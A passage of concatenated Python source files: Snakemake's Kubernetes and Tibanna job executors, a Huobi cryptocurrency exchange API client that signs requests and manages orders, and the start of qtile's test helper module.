with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
        # input & output
        # The local snakemake command here must be run with --default-remote-prefix
        # and --default-remote-provider (forced), but on the VM these options are removed.
        # Snakemake on the VM will then treat these inputs and outputs as non-remote.
        # The files are transferred to the container by Tibanna before running snakemake.
        # In short, the paths on the VM must be consistent with what is in the Snakefile,
        # but the actual location of the files is the S3 bucket/prefix.
        # This mapping info must be passed to Tibanna.
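        # For example (illustrative values only): an input stored at
        # s3://mybucket/prefix/data/a.txt and referenced in the Snakefile as
        # "data/a.txt" is passed to Tibanna as the mapping
        #   {"file:///data1/snakemake/data/a.txt": "s3://mybucket/prefix/data/a.txt"}
        # which is what the loops below construct for inputs and outputs.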
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
        # This is only needed if your backend does not allow the use of callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
                    # Determine whether to benchmark in this process or not at
                    # all here. We benchmark in this process unless the
                    # execution is done through the ``shell:``, ``script:``, or
                    # ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
vnhuobi.py
|
# encoding: utf-8
import sys
import json
import zlib
import urllib
import urllib.parse
import hmac
import base64
import hashlib
import requests
import traceback
from copy import copy
from datetime import datetime
from threading import Thread
from queue import Queue, Empty
from multiprocessing.dummy import Pool
from time import sleep
from websocket import create_connection, _exceptions
# Constant definitions
TIMEOUT = 5
HUOBI_API_HOST = "api.huobi.pro"
HADAX_API_HOST = "api.hadax.com"
LANG = 'zh-CN'
DEFAULT_GET_HEADERS = {
"Content-type": "application/x-www-form-urlencoded",
'Accept': 'application/json',
'Accept-Language': LANG,
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'
}
DEFAULT_POST_HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Accept-Language': LANG,
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'
}
#----------------------------------------------------------------------
def createSign(params, method, host, path, secretKey):
    """Create the request signature"""
sortedParams = sorted(params.items(), key=lambda d: d[0], reverse=False)
encodeParams = urllib.parse.urlencode(sortedParams)
payload = [method, host, path, encodeParams]
payload = '\n'.join(payload)
payload = payload.encode(encoding='UTF8')
secretKey = secretKey.encode(encoding='UTF8')
digest = hmac.new(secretKey, payload, digestmod=hashlib.sha256).digest()
signature = base64.b64encode(digest)
signature = signature.decode()
return signature
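#----------------------------------------------------------------------
# Illustrative sketch only (never called by this module): shows how createSign
# is combined with the standard signature parameters to build a signed GET URL.
# The access key and secret key below are hypothetical placeholders.
def _exampleSignedGetUrl(accessKey='hypothetical-access-key',
                         secretKey='hypothetical-secret-key'):
    """Build a signed URL for GET /v1/account/accounts (example only)"""
    path = '/v1/account/accounts'
    params = {
        'AccessKeyId': accessKey,
        'SignatureMethod': 'HmacSHA256',
        'SignatureVersion': '2',
        'Timestamp': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
    }
    params['Signature'] = createSign(params, 'GET', HUOBI_API_HOST, path, secretKey)
    return 'https://%s%s?%s' % (HUOBI_API_HOST, path, urllib.parse.urlencode(params))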
########################################################################
class TradeApi(object):
    """Trading API"""
HUOBI = 'huobi'
HADAX = 'hadax'
SYNC_MODE = 'sync'
ASYNC_MODE = 'async'
# ----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.accessKey = ''
self.secretKey = ''
self.mode = self.ASYNC_MODE
        self.active = False     # whether the API is running
        self.reqid = 0          # request sequence number
        self.queue = Queue()    # request queue
        self.pool = None        # thread pool
self.DEBUG = False
# ----------------------------------------------------------------------
    def init(self, host, accessKey, secretKey, mode=None):
        """Initialize"""
if host == self.HUOBI:
self.hostname = HUOBI_API_HOST
else:
self.hostname = HADAX_API_HOST
self.hosturl = 'https://%s' %self.hostname
self.accessKey = accessKey
self.secretKey = secretKey
if mode:
self.mode = mode
self.proxies = {}
return True
# ----------------------------------------------------------------------
    def start(self, n=10):
        """Start"""
self.active = True
        # asynchronous mode
if self.mode == self.ASYNC_MODE:
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
# ----------------------------------------------------------------------
    def close(self):
        """Stop"""
self.active = False
self.pool.close()
self.pool.join()
# ----------------------------------------------------------------------
def httpGet(self, url, params):
"""HTTP GET"""
headers = copy(DEFAULT_GET_HEADERS)
postdata = urllib.parse.urlencode(params)
if self.DEBUG:
print('httpGet:{} {}'.format(url, params))
try:
response = requests.get(url, postdata, headers=headers, timeout=TIMEOUT)
if response.status_code == 200:
return True, response.json()
else:
                return False, u'GET request failed, status code: %s' %response.status_code
except Exception as e:
            return False, u'GET request raised an exception: %s' %e
# ----------------------------------------------------------------------
def httpPost(self, url, params, add_to_headers=None):
"""HTTP POST"""
headers = copy(DEFAULT_POST_HEADERS)
postdata = json.dumps(params)
try:
response = requests.post(url, postdata, headers=headers, timeout=TIMEOUT)
if response.status_code == 200:
return True, response.json()
else:
                return False, u'POST request failed, response: %s' %response.json()
except Exception as e:
            return False, u'POST request raised an exception: %s' %e
# ----------------------------------------------------------------------
    def generateSignParams(self):
        """Generate signature parameters"""
timestamp = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
d = {
'AccessKeyId': self.accessKey,
'SignatureMethod': 'HmacSHA256',
'SignatureVersion': '2',
'Timestamp': timestamp
}
return d
# ----------------------------------------------------------------------
def apiGet(self, path, params):
"""API GET"""
method = 'GET'
params.update(self.generateSignParams())
params['Signature'] = createSign(params, method, self.hostname, path, self.secretKey)
url = self.hosturl + path
return self.httpGet(url, params)
# ----------------------------------------------------------------------
def apiPost(self, path, params):
"""API POST"""
method = 'POST'
signParams = self.generateSignParams()
signParams['Signature'] = createSign(signParams, method, self.hostname, path, self.secretKey)
url = self.hosturl + path + '?' + urllib.parse.urlencode(signParams)
if self.DEBUG:
print('api Get:{} {}'.format(url, params))
return self.httpPost(url, params)
# ----------------------------------------------------------------------
    def addReq(self, path, params, func, callback):
        """Add a request"""
        # asynchronous mode
if self.mode == self.ASYNC_MODE:
self.reqid += 1
req = (path, params, func, callback, self.reqid)
self.queue.put(req)
return self.reqid
        # synchronous mode
else:
return func(path, params)
# ----------------------------------------------------------------------
    def processReq(self, req):
        """Process a request"""
path, params, func, callback, reqid = req
result, data = func(path, params)
if result:
if data['status'] == 'ok':
callback(data['data'], reqid)
else:
                msg = u'error code: %s, error message: %s' %(data['err-code'], data['err-msg'])
self.onError(msg, reqid)
else:
self.onError(data, reqid)
            # put the failed request back into the queue to be processed again later
self.queue.put(req)
# ----------------------------------------------------------------------
    def run(self, n):
        """Run continuously"""
while self.active:
try:
req = self.queue.get(timeout=1)
self.processReq(req)
except Empty:
pass
#----------------------------------------------------------------------
    def getSymbols(self):
        """Query symbols"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/common/symbols'
else:
path = '/v1/hadax/common/symbols'
params = {}
func = self.apiGet
callback = self.onGetSymbols
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getCurrencys(self):
        """Query supported currencies"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/common/currencys'
else:
path = '/v1/hadax/common/currencys'
params = {}
func = self.apiGet
callback = self.onGetCurrencys
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getTimestamp(self):
        """Query system timestamp"""
path = '/v1/common/timestamp'
params = {}
func = self.apiGet
callback = self.onGetTimestamp
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getAccounts(self):
        """Query accounts"""
path = '/v1/account/accounts'
params = {}
func = self.apiGet
callback = self.onGetAccounts
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getAccountBalance(self, accountid):
        """Query account balance"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/account/accounts/%s/balance' %accountid
else:
path = '/v1/hadax/account/accounts/%s/balance' %accountid
params = {}
func = self.apiGet
callback = self.onGetAccountBalance
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getOrders(self, symbol, states, types=None, startDate=None,
                  endDate=None, from_=None, direct=None, size=None):
        """Query orders"""
path = '/v1/order/orders'
params = {
'symbol': symbol,
'states': states
}
if types:
params['types'] = types
if startDate:
params['start-date'] = startDate
if endDate:
params['end-date'] = endDate
if from_:
params['from'] = from_
if direct:
params['direct'] = direct
if size:
params['size'] = size
func = self.apiGet
callback = self.onGetOrders
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getMatchResults(self, symbol, types=None, startDate=None,
                        endDate=None, from_=None, direct=None, size=None):
        """Query match results"""
path = '/v1/order/matchresults'
params = {
'symbol': symbol
}
if types:
params['types'] = types
if startDate:
params['start-date'] = startDate
if endDate:
params['end-date'] = endDate
if from_:
params['from'] = from_
if direct:
params['direct'] = direct
if size:
params['size'] = size
func = self.apiGet
callback = self.onGetMatchResults
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getOrder(self, orderid):
        """Query a single order"""
path = '/v1/order/orders/%s' %orderid
params = {}
func = self.apiGet
callback = self.onGetOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def getMatchResult(self, orderid):
        """Query match results of a single order"""
path = '/v1/order/orders/%s/matchresults' %orderid
params = {}
func = self.apiGet
callback = self.onGetMatchResult
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def placeOrder(self, accountid, amount, symbol, type_, price=None, source=None):
        """Place an order"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/order/orders/place'
else:
path = '/v1/hadax/order/orders/place'
params = {
'account-id': accountid,
'amount': amount,
'symbol': symbol,
'type': type_
}
if price:
params['price'] = price
if source:
params['source'] = source
func = self.apiPost
callback = self.onPlaceOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def cancelOrder(self, orderid):
        """Cancel an order"""
path = '/v1/order/orders/%s/submitcancel' %orderid
params = {}
func = self.apiPost
callback = self.onCancelOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def batchCancel(self, orderids):
        """Cancel orders in batch"""
path = '/v1/order/orders/batchcancel'
params = {
'order-ids': orderids
}
func = self.apiPost
callback = self.onBatchCancel
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
    def onError(self, msg, reqid):
        """Error callback"""
print('onError:{},{}'.format(msg, reqid),file=sys.stderr)
#----------------------------------------------------------------------
    def onGetSymbols(self, data, reqid):
        """Symbols query callback"""
#print reqid, data
for d in data:
print(d)
#----------------------------------------------------------------------
    def onGetCurrencys(self, data, reqid):
        """Currencies query callback"""
print(reqid, data)
#----------------------------------------------------------------------
    def onGetTimestamp(self, data, reqid):
        """Timestamp query callback"""
print(reqid, data)
#----------------------------------------------------------------------
    def onGetAccounts(self, data, reqid):
        """Accounts query callback"""
print(reqid, data)
#----------------------------------------------------------------------
    def onGetAccountBalance(self, data, reqid):
        """Account balance query callback"""
print (reqid, data)
for d in data['data']['list']:
print (d)
#----------------------------------------------------------------------
    def onGetOrders(self, data, reqid):
        """Orders query callback"""
print (reqid, data)
#----------------------------------------------------------------------
    def onGetMatchResults(self, data, reqid):
        """Match results query callback"""
print (reqid, data)
#----------------------------------------------------------------------
    def onGetOrder(self, data, reqid):
        """Single order query callback"""
print (reqid, data)
#----------------------------------------------------------------------
    def onGetMatchResult(self, data, reqid):
        """Single order match results query callback"""
print (reqid, data)
#----------------------------------------------------------------------
    def onPlaceOrder(self, data, reqid):
        """Place order callback"""
print (reqid, data)
#----------------------------------------------------------------------
    def onCancelOrder(self, data, reqid):
        """Cancel order callback"""
print(reqid, data)
#----------------------------------------------------------------------
    def onBatchCancel(self, data, reqid):
        """Batch cancel callback"""
print (reqid, data)
########################################################################
class DataApi(object):
    """Market data API"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.ws = None
self.url = ''
self.reqid = 0
self.active = False
self.thread = None # Thread(target=self.run)
self.subDict = {}
self.url = ''
self.proxyHost = ''
self.proxyPort = 0
self.DEBUG = False
#----------------------------------------------------------------------
    def run(self):
        """Run the connection loop"""
while self.active:
try:
stream = self.ws.recv()
result = zlib.decompress(stream, 47).decode('utf-8')
data = json.loads(result)
self.onData(data)
except zlib.error:
                self.onError(u'Failed to decompress data: %s' %stream)
except:
                self.onError('Market data server connection lost')
result = self.reconnect()
if not result:
                    self.onError(u'Waiting 3 seconds before reconnecting')
sleep(3)
else:
                    self.onError(u'Market data server reconnected successfully')
self.resubscribe()
#----------------------------------------------------------------------
    def reconnect(self):
        """Reconnect"""
try:
if self.DEBUG:
print('DataApi:reconnect:{}'.format(self.url))
if not self.proxyHost:
self.ws = create_connection(self.url)
else:
self.ws = create_connection(self.url,
http_proxy_host=self.proxyHost,
http_proxy_port=self.proxyPort)
return True
except:
msg = traceback.format_exc()
            self.onError(u'Market data server reconnection failed: %s' %msg)
return False
#----------------------------------------------------------------------
    def resubscribe(self):
        """Resubscribe to all topics"""
d = self.subDict
self.subDict = {}
for topic in d.keys():
self.subTopic(topic)
#----------------------------------------------------------------------
    def connect(self, url, proxyHost='', proxyPort=0):
        """Connect"""
self.url = url
self.proxyHost = proxyHost
self.proxyPort = proxyPort
try:
if not self.proxyHost:
self.ws = create_connection(self.url)
else:
self.ws = create_connection(self.url,
http_proxy_host=self.proxyHost,
http_proxy_port=self.proxyPort)
self.active = True
if self.thread is None:
self.thread = Thread(target=self.run)
self.thread.start()
return True
except:
msg = traceback.format_exc()
            self.onError(u'Market data server connection failed: %s' %msg)
return False
#----------------------------------------------------------------------
    def close(self):
        """Stop"""
if self.active:
self.active = False
if self.thread is not None:
self.thread.join()
self.ws.close()
#----------------------------------------------------------------------
    def sendReq(self, req):
        """Send a request"""
stream = json.dumps(req)
if self.DEBUG:
print('DataApi.sendReq:{}'.format(stream))
self.ws.send(stream)
#----------------------------------------------------------------------
    def pong(self, data):
        """Respond to the server heartbeat"""
req = {'pong': data['ping']}
self.sendReq(req)
#----------------------------------------------------------------------
    def subTopic(self, topic):
        """Subscribe to a topic"""
if topic in self.subDict:
return
self.reqid += 1
req = {
'sub': topic,
'id': str(self.reqid)
}
self.sendReq(req)
self.subDict[topic] = str(self.reqid)
#----------------------------------------------------------------------
    def unsubTopic(self, topic):
        """Unsubscribe from a topic"""
if topic not in self.subDict:
return
req = {
'unsub': topic,
'id': self.subDict[topic]
}
self.sendReq(req)
del self.subDict[topic]
#----------------------------------------------------------------------
    def subscribeMarketDepth(self, symbol):
        """Subscribe to market depth"""
topic = 'market.%s.depth.step0' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
    def subscribeTradeDetail(self, symbol):
        """Subscribe to trade details"""
topic = 'market.%s.trade.detail' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
    def subscribeMarketDetail(self, symbol):
        """Subscribe to market details"""
topic = 'market.%s.detail' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
    def onError(self, msg):
        """Error push callback"""
print('onError:{}'.format(msg))
#----------------------------------------------------------------------
def onData(self, data):
"""数据推送"""
if 'ping' in data:
self.pong(data)
elif 'ch' in data:
if 'depth.step' in data['ch']:
self.onMarketDepth(data)
elif 'trade.detail' in data['ch']:
self.onTradeDetail(data)
elif 'detail' in data['ch']:
self.onMarketDetail(data)
elif 'err-code' in data:
            self.onError(u'onData error code: %s, message: %s' %(data['err-code'], data['err-msg']))
#----------------------------------------------------------------------
    def onMarketDepth(self, data):
        """Market depth push callback"""
print('onMarketDepth:{}'.format(data))
#----------------------------------------------------------------------
    def onTradeDetail(self, data):
        """Trade detail push callback"""
print('onTradeDetail:{}'.format(data))
#----------------------------------------------------------------------
    def onMarketDetail(self, data):
        """Market detail push callback"""
print('onMarketDetail:{}'.format(data))
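#----------------------------------------------------------------------
# Minimal usage sketch, kept under a __main__ guard so that importing this
# module is unaffected. The websocket endpoint and symbol are assumptions and
# may need to be adjusted for the current Huobi deployment.
if __name__ == '__main__':
    api = DataApi()
    if api.connect('wss://api.huobi.pro/ws'):
        api.subscribeMarketDepth('btcusdt')
        sleep(10)
        api.close()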
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
def __init__(
self,
fail_msg="retry failed!",
ignore_exceptions=(),
dt=sleep_time,
tmax=max_sleep,
return_on_fail=False,
):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
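# Illustrative sketch (not used by the tests themselves): Retry is a decorator
# factory, so a polling check is wrapped as shown below and retried with the
# delay growing by 1.5x per attempt until roughly `tmax` seconds have elapsed.
# The wait_for_value predicate is hypothetical.
#
#     @Retry(ignore_exceptions=(ValueError,), fail_msg="value never appeared")
#     def wait_for_value(get_value):
#         if get_value() is None:
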